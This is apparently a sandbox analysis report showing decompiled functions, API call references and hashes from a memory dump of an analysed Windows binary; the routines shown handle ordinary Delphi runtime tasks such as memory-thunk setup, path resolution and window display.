                                  • Opcode ID: 1d98116b899e6dad0f23848bcab155ddb68db16b8b6dc093d4533f62986dabc7
                                  • Instruction ID: cb0795bba48fe4944a77baed4b981b17b22ff9c7f9537bef7671d2c9ea66ac43
                                  • Opcode Fuzzy Hash: 1d98116b899e6dad0f23848bcab155ddb68db16b8b6dc093d4533f62986dabc7
                                  • Instruction Fuzzy Hash: 9F11CE76A047019FC3108F29CC80A1BB7E5EFC4361F05C53DE598A73A5E735AC418B49
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00419F54(intOrPtr _a4, intOrPtr _a8) {
                                  				void* _t14;
                                  				void _t15;
                                  				intOrPtr _t25;
                                  				char* _t26;
                                  				void* _t35;
                                  
                                  				if( *0x44f884 == 0) {
                                  					_t14 = VirtualAlloc(0, 0x1000, 0x1000, 0x40); // executed
                                  					_t35 = _t14;
                                  					_t15 =  *0x44f880; // 0x610000
                                  					 *_t35 = _t15;
                                  					_t1 = _t35 + 4; // 0x4
                                  					E004028B8(0x44d3ec, 2, _t1);
                                  					_t2 = _t35 + 5; // 0x5
                                  					 *((intOrPtr*)(_t35 + 6)) = E00419F4C(_t2, E00419F2C);
                                  					_t4 = _t35 + 0xa; // 0xa
                                  					_t26 = _t4;
                                  					do {
                                  						 *_t26 = 0xe8;
                                  						_t5 = _t35 + 4; // 0x4
                                  						 *((intOrPtr*)(_t26 + 1)) = E00419F4C(_t26, _t5);
                                  						 *((intOrPtr*)(_t26 + 5)) =  *0x44f884;
                                  						 *0x44f884 = _t26;
                                  						_t26 = _t26 + 0xd;
                                  					} while (_t26 - _t35 < 0xffc);
                                  					 *0x44f880 = _t35;
                                  				}
                                  				_t25 =  *0x44f884;
                                  				 *0x44f884 =  *((intOrPtr*)(_t25 + 5));
                                  				 *((intOrPtr*)(_t25 + 5)) = _a4;
                                  				 *((intOrPtr*)(_t25 + 9)) = _a8;
                                  				return  *0x44f884;
                                  			}









                                  APIs
                                  • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040), ref: 00419F72
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: AllocVirtual
                                  • String ID:
                                  • API String ID: 4275171209-0
                                  • Opcode ID: 31cfe24dff61b9a1b27bf233503cf63d1a08518ab1e38e3088d5a77c31aa035e
                                  • Instruction ID: d419a49ea90da181cd21ae955be0258d3c3f444cfa0f9024e47cf4dbe1e1ee23
                                  • Opcode Fuzzy Hash: 31cfe24dff61b9a1b27bf233503cf63d1a08518ab1e38e3088d5a77c31aa035e
                                  • Instruction Fuzzy Hash: E11157746007059BD710EF19C880B86FBE4EF88790F14C57AE998CF385D3B8E8458BA8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Non-executed Functions

                                  C-Code - Quality: 53%
                                  			E00404EB8(char* __eax, intOrPtr __edx) {
                                  				char* _v8;
                                  				intOrPtr _v12;
                                  				intOrPtr _v16;
                                  				struct _WIN32_FIND_DATAA _v334;
                                  				char _v595;
                                  				void* _t45;
                                  				char* _t54;
                                  				char* _t64;
                                  				void* _t83;
                                  				intOrPtr* _t84;
                                  				char* _t90;
                                  				struct HINSTANCE__* _t91;
                                  				char* _t93;
                                  				void* _t94;
                                  				char* _t95;
                                  				void* _t96;
                                  
                                  				_v12 = __edx;
                                  				_v8 = __eax;
                                  				_v16 = _v8;
                                  				_t91 = GetModuleHandleA("kernel32.dll");
                                  				if(_t91 == 0) {
                                  					L4:
                                  					if( *_v8 != 0x5c) {
                                  						_t93 = _v8 + 2;
                                  						goto L10;
                                  					} else {
                                  						if( *((char*)(_v8 + 1)) == 0x5c) {
                                  							_t95 = E00404EA4(_v8 + 2);
                                  							if( *_t95 != 0) {
                                  								_t14 = _t95 + 1; // 0x1
                                  								_t93 = E00404EA4(_t14);
                                  								if( *_t93 != 0) {
                                  									L10:
                                  									_t83 = _t93 - _v8;
                                  									_push(_t83 + 1);
                                  									_push(_v8);
                                  									_push( &_v595);
                                  									L00401294();
                                  									while( *_t93 != 0) {
                                  										_t90 = E00404EA4(_t93 + 1);
                                  										_t45 = _t90 - _t93;
                                  										if(_t45 + _t83 + 1 <= 0x105) {
                                  											_push(_t45 + 1);
                                  											_push(_t93);
                                  											_push( &(( &_v595)[_t83]));
                                  											L00401294();
                                  											_t94 = FindFirstFileA( &_v595,  &_v334);
                                  											if(_t94 != 0xffffffff) {
                                  												FindClose(_t94);
                                  												_t54 =  &(_v334.cFileName);
                                  												_push(_t54);
                                  												L0040129C();
                                  												if(_t54 + _t83 + 1 + 1 <= 0x105) {
                                  													 *((char*)(_t96 + _t83 - 0x24f)) = 0x5c;
                                  													_push(0x105 - _t83 - 1);
                                  													_push( &(_v334.cFileName));
                                  													_push( &(( &(( &_v595)[_t83]))[1]));
                                  													L00401294();
                                  													_t64 =  &(_v334.cFileName);
                                  													_push(_t64);
                                  													L0040129C();
                                  													_t83 = _t83 + _t64 + 1;
                                  													_t93 = _t90;
                                  													continue;
                                  												}
                                  											}
                                  										}
                                  										goto L17;
                                  									}
                                  									_push(_v12);
                                  									_push( &_v595);
                                  									_push(_v8);
                                  									L00401294();
                                  								}
                                  							}
                                  						}
                                  					}
                                  				} else {
                                  					_t84 = GetProcAddress(_t91, "GetLongPathNameA");
                                  					if(_t84 == 0) {
                                  						goto L4;
                                  					} else {
                                  						_push(0x105);
                                  						_push( &_v595);
                                  						_push(_v8);
                                  						if( *_t84() == 0) {
                                  							goto L4;
                                  						} else {
                                  							_push(_v12);
                                  							_push( &_v595);
                                  							_push(_v8);
                                  							L00401294();
                                  						}
                                  					}
                                  				}
                                  				L17:
                                  				return _v16;
                                  			}




















                                  APIs
                                  • GetModuleHandleA.KERNEL32(kernel32.dll,?,00000001,0044D0A4,?,00405118,00000000,00405175,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 00404ED5
                                  • GetProcAddress.KERNEL32(00000000,GetLongPathNameA), ref: 00404EE6
                                  • lstrcpyn.KERNEL32(?,?,?,?,00000001,0044D0A4,?,00405118,00000000,00405175,?,80000001,Software\Borland\Locales,00000000,000F0019,?), ref: 00404F16
                                  • lstrcpyn.KERNEL32(?,?,?,kernel32.dll,?,00000001,0044D0A4,?,00405118,00000000,00405175,?,80000001,Software\Borland\Locales,00000000,000F0019), ref: 00404F7A
                                  • lstrcpyn.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,?,00000001,0044D0A4,?,00405118,00000000,00405175,?,80000001), ref: 00404FAF
                                  • FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,?,00000001,0044D0A4,?,00405118,00000000,00405175), ref: 00404FC2
                                  • FindClose.KERNEL32(00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,?,00000001,0044D0A4,?,00405118,00000000), ref: 00404FCF
                                  • lstrlen.KERNEL32(?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,?,00000001,0044D0A4,?,00405118), ref: 00404FDB
                                  • lstrcpyn.KERNEL32(0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,?,00000001), ref: 0040500F
                                  • lstrlen.KERNEL32(?,0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll), ref: 0040501B
                                  • lstrcpyn.KERNEL32(?,0000005C,?,?,0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?), ref: 0040503D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                  • String ID: GetLongPathNameA$\$kernel32.dll
                                  • API String ID: 3245196872-1565342463
                                  • Opcode ID: 064bd4271abd3baf5f6a2ea5bf1372874cfae7e78b4d63dd141667c34cc62e5c
                                  • Instruction ID: 9798656d04a7b00f6dc240650ffacff7d6aa2fe947a2b393b3f1bd6a93fe5dfb
                                  • Opcode Fuzzy Hash: 064bd4271abd3baf5f6a2ea5bf1372874cfae7e78b4d63dd141667c34cc62e5c
                                  • Instruction Fuzzy Hash: 454164B2A00559ABDB10DAA8CD85ADF77ECEF48304F1401FAB548F7281D6789E458F98
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 83%
                                  			E004474C0(intOrPtr* __eax, void* __ebx, void* __edi, void* __esi) {
                                  				intOrPtr* _v8;
                                  				char _v12;
                                  				intOrPtr _t149;
                                  				intOrPtr _t154;
                                  				intOrPtr _t155;
                                  				intOrPtr _t160;
                                  				intOrPtr _t162;
                                  				intOrPtr _t163;
                                  				void* _t165;
                                  				struct HWND__* _t166;
                                  				long _t176;
                                  				signed int _t198;
                                  				signed int _t199;
                                  				long _t220;
                                  				intOrPtr _t226;
                                  				int _t231;
                                  				intOrPtr _t232;
                                  				intOrPtr _t241;
                                  				intOrPtr _t245;
                                  				signed int _t248;
                                  				intOrPtr _t251;
                                  				intOrPtr _t252;
                                  				signed int _t258;
                                  				long _t259;
                                  				intOrPtr _t262;
                                  				intOrPtr _t266;
                                  				signed int _t269;
                                  				intOrPtr _t270;
                                  				intOrPtr _t271;
                                  				signed int _t277;
                                  				long _t278;
                                  				intOrPtr _t281;
                                  				signed int _t286;
                                  				signed int _t287;
                                  				long _t290;
                                  				intOrPtr _t294;
                                  				struct HWND__* _t299;
                                  				signed int _t301;
                                  				signed int _t302;
                                  				signed int _t305;
                                  				signed int _t307;
                                  				long _t308;
                                  				signed int _t311;
                                  				signed int _t313;
                                  				long _t314;
                                  				signed int _t317;
                                  				signed int _t318;
                                  				signed int _t326;
                                  				long _t328;
                                  				intOrPtr _t331;
                                  				intOrPtr _t362;
                                  				long _t370;
                                  				void* _t372;
                                  				void* _t373;
                                  				intOrPtr _t374;
                                  
                                  				_t372 = _t373;
                                  				_t374 = _t373 + 0xfffffff8;
                                  				_v12 = 0;
                                  				_v8 = __eax;
                                  				_push(_t372);
                                  				_push(0x447a2a);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t374;
                                  				if(( *(_v8 + 0x1c) & 0x00000010) == 0 && ( *(_v8 + 0x2f4) & 0x00000004) != 0) {
                                  					_t294 =  *0x44e100; // 0x41a2b0
                                  					E00405910(_t294,  &_v12);
                                  					E0040B070(_v12, 1);
                                  					E0040384C();
                                  				}
                                  				_t149 =  *0x44fbb0; // 0x2191714
                                  				E0044BB54(_t149);
                                  				 *(_v8 + 0x2f4) =  *(_v8 + 0x2f4) | 0x00000004;
                                  				_push(_t372);
                                  				_push(0x447a0d);
                                  				_push( *[fs:edx]);
                                  				 *[fs:edx] = _t374;
                                  				if(( *(_v8 + 0x1c) & 0x00000010) == 0) {
                                  					_t155 = _v8;
                                  					_t378 =  *((char*)(_t155 + 0x1a6));
                                  					if( *((char*)(_t155 + 0x1a6)) == 0) {
                                  						_push(_t372);
                                  						_push(0x447914);
                                  						_push( *[fs:eax]);
                                  						 *[fs:eax] = _t374;
                                  						E004032D4(_v8, __eflags);
                                  						 *[fs:eax] = 0;
                                  						_t160 =  *0x44fbb4; // 0x2191320
                                  						__eflags =  *((intOrPtr*)(_t160 + 0x6c)) - _v8;
                                  						if( *((intOrPtr*)(_t160 + 0x6c)) == _v8) {
                                  							__eflags = 0;
                                  							E0044666C(_v8, 0);
                                  						}
                                  						_t162 = _v8;
                                  						__eflags =  *((char*)(_t162 + 0x22f)) - 1;
                                  						if( *((char*)(_t162 + 0x22f)) != 1) {
                                  							_t163 = _v8;
                                  							__eflags =  *(_t163 + 0x2f4) & 0x00000008;
                                  							if(( *(_t163 + 0x2f4) & 0x00000008) == 0) {
                                  								_t299 = 0;
                                  								_t165 = E004325A4(_v8);
                                  								_t166 = GetActiveWindow();
                                  								__eflags = _t165 - _t166;
                                  								if(_t165 == _t166) {
                                  									_t176 = IsIconic(E004325A4(_v8));
                                  									__eflags = _t176;
                                  									if(_t176 == 0) {
                                  										_t299 = E004422D0(E004325A4(_v8));
                                  									}
                                  								}
                                  								__eflags = _t299;
                                  								if(_t299 == 0) {
                                  									ShowWindow(E004325A4(_v8), 0);
                                  								} else {
                                  									SetWindowPos(E004325A4(_v8), 0, 0, 0, 0, 0, 0x97);
                                  									SetActiveWindow(_t299);
                                  								}
                                  							} else {
                                  								SetWindowPos(E004325A4(_v8), 0, 0, 0, 0, 0, 0x97);
                                  							}
                                  						} else {
                                  							E0042FAFC(_v8);
                                  						}
                                  					} else {
                                  						_push(_t372);
                                  						_push(0x447578);
                                  						_push( *[fs:eax]);
                                  						 *[fs:eax] = _t374;
                                  						E004032D4(_v8, _t378);
                                  						 *[fs:eax] = 0;
                                  						if( *((char*)(_v8 + 0x230)) == 4 ||  *((char*)(_v8 + 0x230)) == 6 &&  *((char*)(_v8 + 0x22f)) == 1) {
                                  							if( *((char*)(_v8 + 0x22f)) != 1) {
                                  								_t301 = E00448D58() -  *(_v8 + 0x48);
                                  								__eflags = _t301;
                                  								_t302 = _t301 >> 1;
                                  								if(_t301 < 0) {
                                  									asm("adc ebx, 0x0");
                                  								}
                                  								_t198 = E00448D4C() -  *(_v8 + 0x4c);
                                  								__eflags = _t198;
                                  								_t199 = _t198 >> 1;
                                  								if(_t198 < 0) {
                                  									asm("adc eax, 0x0");
                                  								}
                                  							} else {
                                  								_t241 =  *0x44fbb0; // 0x2191714
                                  								_t305 = E0042B8F4( *((intOrPtr*)(_t241 + 0x44))) -  *(_v8 + 0x48);
                                  								_t302 = _t305 >> 1;
                                  								if(_t305 < 0) {
                                  									asm("adc ebx, 0x0");
                                  								}
                                  								_t245 =  *0x44fbb0; // 0x2191714
                                  								_t248 = E0042B938( *((intOrPtr*)(_t245 + 0x44))) -  *(_v8 + 0x4c);
                                  								_t199 = _t248 >> 1;
                                  								if(_t248 < 0) {
                                  									asm("adc eax, 0x0");
                                  								}
                                  							}
                                  							if(_t302 < 0) {
                                  								_t302 = 0;
                                  							}
                                  							if(_t199 < 0) {
                                  								_t199 = 0;
                                  							}
                                  							_t326 = _t199;
                                  							 *((intOrPtr*)( *_v8 + 0x84))( *(_v8 + 0x4c),  *(_v8 + 0x48));
                                  							if( *((char*)(_v8 + 0x57)) != 0) {
                                  								E0044591C(_v8, _t326);
                                  							}
                                  						} else {
                                  							_t251 =  *((intOrPtr*)(_v8 + 0x230));
                                  							__eflags = _t251 + 0xfa - 2;
                                  							if(_t251 + 0xfa - 2 >= 0) {
                                  								__eflags = _t251 - 5;
                                  								if(_t251 == 5) {
                                  									_t252 = _v8;
                                  									__eflags =  *((char*)(_t252 + 0x22f)) - 1;
                                  									if( *((char*)(_t252 + 0x22f)) != 1) {
                                  										_t307 = E00448D88() -  *(_v8 + 0x48);
                                  										__eflags = _t307;
                                  										_t308 = _t307 >> 1;
                                  										if(_t307 < 0) {
                                  											asm("adc ebx, 0x0");
                                  										}
                                  										_t258 = E00448D7C() -  *(_v8 + 0x4c);
                                  										__eflags = _t258;
                                  										_t259 = _t258 >> 1;
                                  										if(_t258 < 0) {
                                  											asm("adc eax, 0x0");
                                  										}
                                  									} else {
                                  										_t262 =  *0x44fbb0; // 0x2191714
                                  										_t311 = E0042B8F4( *((intOrPtr*)(_t262 + 0x44))) -  *(_v8 + 0x48);
                                  										__eflags = _t311;
                                  										_t308 = _t311 >> 1;
                                  										if(_t311 < 0) {
                                  											asm("adc ebx, 0x0");
                                  										}
                                  										_t266 =  *0x44fbb0; // 0x2191714
                                  										_t269 = E0042B938( *((intOrPtr*)(_t266 + 0x44))) -  *(_v8 + 0x4c);
                                  										__eflags = _t269;
                                  										_t259 = _t269 >> 1;
                                  										if(_t269 < 0) {
                                  											asm("adc eax, 0x0");
                                  										}
                                  									}
                                  									__eflags = _t308;
                                  									if(_t308 < 0) {
                                  										_t308 = 0;
                                  										__eflags = 0;
                                  									}
                                  									__eflags = _t259;
                                  									if(_t259 < 0) {
                                  										_t259 = 0;
                                  										__eflags = 0;
                                  									}
                                  									 *((intOrPtr*)( *_v8 + 0x84))( *(_v8 + 0x4c),  *(_v8 + 0x48));
                                  								}
                                  							} else {
                                  								_t270 =  *0x44fbb0; // 0x2191714
                                  								_t370 =  *(_t270 + 0x44);
                                  								_t271 = _v8;
                                  								__eflags =  *((char*)(_t271 + 0x230)) - 7;
                                  								if( *((char*)(_t271 + 0x230)) == 7) {
                                  									_t362 =  *0x440c08; // 0x440c54
                                  									_t290 = E00403264( *(_v8 + 4), _t362);
                                  									__eflags = _t290;
                                  									if(_t290 != 0) {
                                  										_t370 =  *(_v8 + 4);
                                  									}
                                  								}
                                  								__eflags = _t370;
                                  								if(_t370 == 0) {
                                  									_t313 = E00448D58() -  *(_v8 + 0x48);
                                  									__eflags = _t313;
                                  									_t314 = _t313 >> 1;
                                  									if(_t313 < 0) {
                                  										asm("adc ebx, 0x0");
                                  									}
                                  									_t277 = E00448D4C() -  *(_v8 + 0x4c);
                                  									__eflags = _t277;
                                  									_t278 = _t277 >> 1;
                                  									if(_t277 < 0) {
                                  										asm("adc eax, 0x0");
                                  									}
                                  								} else {
                                  									_t317 =  *((intOrPtr*)(_t370 + 0x48)) -  *(_v8 + 0x48);
                                  									__eflags = _t317;
                                  									_t318 = _t317 >> 1;
                                  									if(_t317 < 0) {
                                  										asm("adc ebx, 0x0");
                                  									}
                                  									_t314 = _t318 +  *((intOrPtr*)(_t370 + 0x40));
                                  									_t286 =  *((intOrPtr*)(_t370 + 0x4c)) -  *(_v8 + 0x4c);
                                  									__eflags = _t286;
                                  									_t287 = _t286 >> 1;
                                  									if(_t286 < 0) {
                                  										asm("adc eax, 0x0");
                                  									}
                                  									_t278 = _t287 +  *((intOrPtr*)(_t370 + 0x44));
                                  								}
                                  								__eflags = _t314;
                                  								if(_t314 < 0) {
                                  									_t314 = 0;
                                  									__eflags = 0;
                                  								}
                                  								__eflags = _t278;
                                  								if(_t278 < 0) {
                                  									_t278 = 0;
                                  									__eflags = 0;
                                  								}
                                  								_t328 = _t278;
                                  								 *((intOrPtr*)( *_v8 + 0x84))( *(_v8 + 0x4c),  *(_v8 + 0x48));
                                  								_t281 = _v8;
                                  								__eflags =  *((char*)(_t281 + 0x57));
                                  								if( *((char*)(_t281 + 0x57)) != 0) {
                                  									E0044591C(_v8, _t328);
                                  								}
                                  							}
                                  						}
                                  						 *((char*)(_v8 + 0x230)) = 0;
                                  						if( *((char*)(_v8 + 0x22f)) != 1) {
                                  							ShowWindow(E004325A4(_v8),  *(0x44dc94 + ( *(_v8 + 0x22b) & 0x000000ff) * 4));
                                  						} else {
                                  							if( *(_v8 + 0x22b) != 2) {
                                  								ShowWindow(E004325A4(_v8),  *(0x44dc94 + ( *(_v8 + 0x22b) & 0x000000ff) * 4));
                                  								_t220 =  *(_v8 + 0x48) |  *(_v8 + 0x4c) << 0x00000010;
                                  								__eflags = _t220;
                                  								CallWindowProcA(0x4061c8, E004325A4(_v8), 5, 0, _t220);
                                  								E0042C114();
                                  							} else {
                                  								_t231 = E004325A4(_v8);
                                  								_t232 =  *0x44fbb0; // 0x2191714
                                  								SendMessageA( *( *((intOrPtr*)(_t232 + 0x44)) + 0x254), 0x223, _t231, 0);
                                  								ShowWindow(E004325A4(_v8), 3);
                                  							}
                                  							_t226 =  *0x44fbb0; // 0x2191714
                                  							SendMessageA( *( *((intOrPtr*)(_t226 + 0x44)) + 0x254), 0x234, 0, 0);
                                  						}
                                  					}
                                  				}
                                  				_pop(_t331);
                                  				 *[fs:eax] = _t331;
                                  				_push(0x447a14);
                                  				_t154 = _v8;
                                  				 *(_t154 + 0x2f4) =  *(_t154 + 0x2f4) & 0x000000fb;
                                  				return _t154;
                                  			}

                                  0x0044770a
                                  0x0044770a
                                  0x0044770d
                                  0x0044770f
                                  0x00447711
                                  0x00447711
                                  0x004476bc
                                  0x004476c2
                                  0x004476c2
                                  0x004476c5
                                  0x004476c7
                                  0x004476c9
                                  0x004476c9
                                  0x004476cc
                                  0x004476d5
                                  0x004476d5
                                  0x004476d8
                                  0x004476da
                                  0x004476dc
                                  0x004476dc
                                  0x004476df
                                  0x004476df
                                  0x00447714
                                  0x00447716
                                  0x00447718
                                  0x00447718
                                  0x00447718
                                  0x0044771a
                                  0x0044771c
                                  0x0044771e
                                  0x0044771e
                                  0x0044771e
                                  0x0044772e
                                  0x00447737
                                  0x0044773d
                                  0x00447740
                                  0x00447744
                                  0x0044774d
                                  0x0044774d
                                  0x00447744
                                  0x00447683
                                  0x004477ff
                                  0x00447810
                                  0x004478e6
                                  0x00447816
                                  0x00447820
                                  0x00447873
                                  0x00447887
                                  0x00447887
                                  0x0044789c
                                  0x004478a4
                                  0x00447822
                                  0x00447827
                                  0x00447832
                                  0x00447841
                                  0x00447851
                                  0x00447851
                                  0x004478b2
                                  0x004478c1
                                  0x004478c1
                                  0x00447810
                                  0x0044754e
                                  0x004479f7
                                  0x004479fa
                                  0x004479fd
                                  0x00447a02
                                  0x00447a05
                                  0x00447a0c

                                  APIs
                                  • SendMessageA.USER32(?,00000223,00000000,00000000), ref: 00447841
                                    • Part of subcall function 00405910: LoadStringA.USER32 ref: 00405941
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: LoadMessageSendString
                                  • String ID:
                                  • API String ID: 1946433856-0
                                  • Opcode ID: ad1222f94e0213ba0134336c71fa07fef18579c8ec54a72a30f658754ae220c5
                                  • Instruction ID: 3aa98c2587dad14828a5119e9969fbe688d1a32f0099da2cdc317963c0a8b1b0
                                  • Opcode Fuzzy Hash: ad1222f94e0213ba0134336c71fa07fef18579c8ec54a72a30f658754ae220c5
                                  • Instruction Fuzzy Hash: 88F16D35A04644EFEB00DFA9CA95B9E77F5AF05304F5501BAE500AB3A2D778BE01DB48
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 75%
                                  			E00432810(void* __eax) {
                                  				void* _v28;
                                  				struct _WINDOWPLACEMENT _v56;
                                  				struct tagPOINT _v64;
                                  				intOrPtr _v68;
                                  				void* _t43;
                                  				struct HWND__* _t45;
                                  				struct tagPOINT* _t47;
                                  
                                  				_t47 =  &(_v64.y);
                                  				_t43 = __eax;
                                  				if(IsIconic( *(__eax + 0x180)) == 0) {
                                  					GetWindowRect( *(_t43 + 0x180), _t47);
                                  				} else {
                                  					_v56.length = 0x2c;
                                  					GetWindowPlacement( *(_t43 + 0x180),  &_v56);
                                  					asm("movsd");
                                  					asm("movsd");
                                  					asm("movsd");
                                  					asm("movsd");
                                  				}
                                  				if((GetWindowLongA( *(_t43 + 0x180), 0xfffffff0) & 0x40000000) != 0) {
                                  					_t45 = GetWindowLongA( *(_t43 + 0x180), 0xfffffff8);
                                  					if(_t45 != 0) {
                                  						ScreenToClient(_t45, _t47);
                                  						ScreenToClient(_t45,  &_v64);
                                  					}
                                  				}
                                  				 *(_t43 + 0x40) = _t47->x;
                                  				 *((intOrPtr*)(_t43 + 0x44)) = _v68;
                                  				 *((intOrPtr*)(_t43 + 0x48)) = _v64.x - _t47->x;
                                  				 *((intOrPtr*)(_t43 + 0x4c)) = _v64.y.x - _v68;
                                  				return E0042B544(_t43);
                                  			}











                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: Window$ClientLongScreen$IconicPlacementRect
                                  • String ID: ,
                                  • API String ID: 2266315723-3772416878
                                  • Opcode ID: 940657ae7acb0d9bb828cddbfd4ebf674a7418cb316be1fa9443a139bba893c4
                                  • Instruction ID: da3091b49873e7d1aa76414d81980a81db688202fe5137eeea3dbb1a6e120157
                                  • Opcode Fuzzy Hash: 940657ae7acb0d9bb828cddbfd4ebf674a7418cb316be1fa9443a139bba893c4
                                  • Instruction Fuzzy Hash: 3A118E71500210AFCB01EE6DC885A8B37E8AF4D314F184A7EFD58DB285EB39D9148BA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 91%
                                  			E0043F764(intOrPtr __eax, void* __ebx, intOrPtr* __edx, void* __edi, void* __esi) {
                                  				intOrPtr _v8;
                                  				struct HMENU__* _v12;
                                  				signed int _v16;
                                  				char _v17;
                                  				intOrPtr _v24;
                                  				int _v28;
                                  				struct HDC__* _v32;
                                  				intOrPtr _v36;
                                  				intOrPtr _v40;
                                  				intOrPtr _v44;
                                  				intOrPtr* _v48;
                                  				char _v52;
                                  				intOrPtr _t137;
                                  				signed int _t138;
                                  				intOrPtr _t144;
                                  				signed int _t150;
                                  				signed int _t151;
                                  				intOrPtr* _t153;
                                  				void* _t158;
                                  				struct HMENU__* _t160;
                                  				intOrPtr* _t165;
                                  				void* _t173;
                                  				signed int _t177;
                                  				signed int _t181;
                                  				void* _t182;
                                  				void* _t214;
                                  				struct HDC__* _t221;
                                  				void* _t251;
                                  				signed int _t257;
                                  				void* _t265;
                                  				signed int _t271;
                                  				signed int _t272;
                                  				signed int _t274;
                                  				signed int _t275;
                                  				signed int _t277;
                                  				signed int _t278;
                                  				signed int _t280;
                                  				signed int _t281;
                                  				signed int _t283;
                                  				signed int _t284;
                                  				signed int _t286;
                                  				signed int _t287;
                                  				signed int _t290;
                                  				signed int _t291;
                                  				intOrPtr _t307;
                                  				intOrPtr _t311;
                                  				intOrPtr _t333;
                                  				intOrPtr _t342;
                                  				intOrPtr _t346;
                                  				intOrPtr* _t353;
                                  				signed int _t355;
                                  				intOrPtr* _t356;
                                  				signed int _t367;
                                  				signed int _t368;
                                  				signed int _t369;
                                  				signed int _t370;
                                  				signed int _t371;
                                  				signed int _t372;
                                  				signed int _t373;
                                  				intOrPtr* _t375;
                                  				void* _t377;
                                  				void* _t378;
                                  				intOrPtr _t379;
                                  				void* _t380;
                                  
                                  				_t377 = _t378;
                                  				_t379 = _t378 + 0xffffffd0;
                                  				_v52 = 0;
                                  				_t375 = __edx;
                                  				_v8 = __eax;
                                  				_push(_t377);
                                  				_push(0x43fc97);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t379;
                                  				_t137 =  *__edx;
                                  				_t380 = _t137 - 0x111;
                                  				if(_t380 > 0) {
                                  					_t138 = _t137 - 0x117;
                                  					__eflags = _t138;
                                  					if(_t138 == 0) {
                                  						_t271 =  *((intOrPtr*)(_v8 + 8)) - 1;
                                  						__eflags = _t271;
                                  						if(_t271 < 0) {
                                  							goto L67;
                                  						} else {
                                  							_t272 = _t271 + 1;
                                  							_t367 = 0;
                                  							__eflags = 0;
                                  							while(1) {
                                  								_t150 = E0043EB10(E00413524(_v8, _t367),  *(_t375 + 4), __eflags);
                                  								__eflags = _t150;
                                  								if(_t150 != 0) {
                                  									goto L68;
                                  								}
                                  								_t367 = _t367 + 1;
                                  								_t272 = _t272 - 1;
                                  								__eflags = _t272;
                                  								if(_t272 != 0) {
                                  									continue;
                                  								} else {
                                  									goto L67;
                                  								}
                                  								goto L68;
                                  							}
                                  						}
                                  					} else {
                                  						_t151 = _t138 - 8;
                                  						__eflags = _t151;
                                  						if(_t151 == 0) {
                                  							_v17 = 0;
                                  							__eflags =  *(__edx + 6) & 0x00000010;
                                  							if(( *(__edx + 6) & 0x00000010) != 0) {
                                  								_v17 = 1;
                                  							}
                                  							_t274 =  *((intOrPtr*)(_v8 + 8)) - 1;
                                  							__eflags = _t274;
                                  							if(__eflags < 0) {
                                  								L32:
                                  								_t153 =  *0x44dfb8; // 0x44fbb0
                                  								E0044BA64( *_t153, 0, __eflags);
